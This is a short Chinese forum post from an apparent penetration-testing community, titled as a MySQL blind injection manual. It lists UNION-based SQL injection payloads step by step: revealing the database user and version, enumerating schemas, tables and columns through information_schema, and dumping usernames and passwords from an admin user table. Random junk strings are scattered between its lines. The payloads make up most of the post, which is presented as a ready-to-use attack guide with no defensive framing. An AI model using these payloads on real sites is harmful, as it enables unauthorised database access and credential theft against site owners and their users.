中国网络渗透测试联盟
标题:
mysql盲注手册
[打印本页]
作者:
admin
时间:
2012-9-13 16:27
标题:
mysql盲注手册
/ x2 w4 M2 L5 J0 E& B' C# r( h
教程内容:Mysql 5+php 注入
: x3 U3 E' q# y: Z2 t) R5 l( |
4 S7 Z$ S0 N1 s6 R( L' |4 b
, \, A9 d- P) p, D1 E
# W: P% X2 f5 Z
一.查看MYSQL基本信息(库名,版本,用户)
# j! y5 J/ O& v; H5 Y% r
* L1 `, ^' A! M* l+ P
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
6 x" A5 q- [* e7 p6 T( c
# }* y$ U# L/ |, u+ X
二.查数据库
/ r! R' l, D3 a+ y8 ]) ^' z
* x/ N1 j& Z5 l, V
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
+ L6 f# m8 V% Y2 Q: C
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
8 B' Q$ r7 H- `% s) V$ n1 z
1 F' _- K: H8 h+ w- e% D' j
三.暴表
" a; {! ~7 o, Z: m
/ a4 v( G4 p" s9 [7 \$ b0 r
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
) V7 G' j4 ~4 O2 P' j- F3 O8 G
3 `. @# X/ b" _: h
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& w% ?+ x" w; |2 j
C! B, Y; N. b8 p! s. ?. X! k8 ^
四.暴字段
( t* s T' W6 Y5 j* k1 @8 L) I3 @4 i
# H0 }3 I! B; H
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
! r# ^6 e6 Y6 T, x, b( M7 p
5 \5 B$ t n2 [, p
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
* f2 K" G1 S2 P K
0 {7 y! q% b- j4 K$ g! g
五.暴数据
: T! h8 `) U) s3 `4 h5 W" }
/ b6 g) Y! A( p2 p0 |
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
. `" D: c4 d) S4 [
4 e% y% }5 m" H
5 E n( }) G# F) N) h7 b
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
9 R, L. ]0 z3 J! n: c4 N
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2